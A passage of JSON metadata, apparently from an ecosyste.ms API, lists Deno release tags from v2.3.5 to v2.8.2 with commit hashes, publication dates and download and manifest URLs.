s/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/